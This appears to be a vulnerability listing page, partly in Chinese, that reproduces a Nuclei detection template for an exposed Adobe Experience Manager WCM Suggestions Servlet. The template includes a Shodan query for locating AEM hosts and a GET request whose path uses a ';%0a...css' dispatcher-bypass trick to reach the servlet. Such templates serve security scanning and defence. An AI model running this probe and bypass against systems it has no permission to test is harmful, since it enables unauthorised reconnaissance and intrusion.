aem-wcm-suggestions-servlet: AEM WCM Suggestions Servlet

日期: 2025-08-01 | 影响软件: AEM WCM Suggestions Servlet | POC: 已公开

漏洞描述

AEM WCM Suggestions Servlet is exposed.

PoC代码[已公开]

id: aem-wcm-suggestions-servlet

info:
  name: AEM WCM Suggestions Servlet
  author: DhiyaneshDk
  severity: low
  description: AEM WCM Suggestions Servlet is exposed.
  reference:
    - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96
  metadata:
    max-request: 1
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig,intrusive,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre={{randstr}}'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '{{randstr}}'
          - '"results":'
          - '"suggestions":'
        condition: and
# digest: 4b0a0048304602210083f3ac894b37fd62c9afe8761324b257938be6a2e03fb18117813653c0b1c5a2022100d0ba9203295e051c9609f26b425a76835a6ae8679ff5f04f2d19141f3b07b1fc:922c64590222798bb761d5b6d8e72950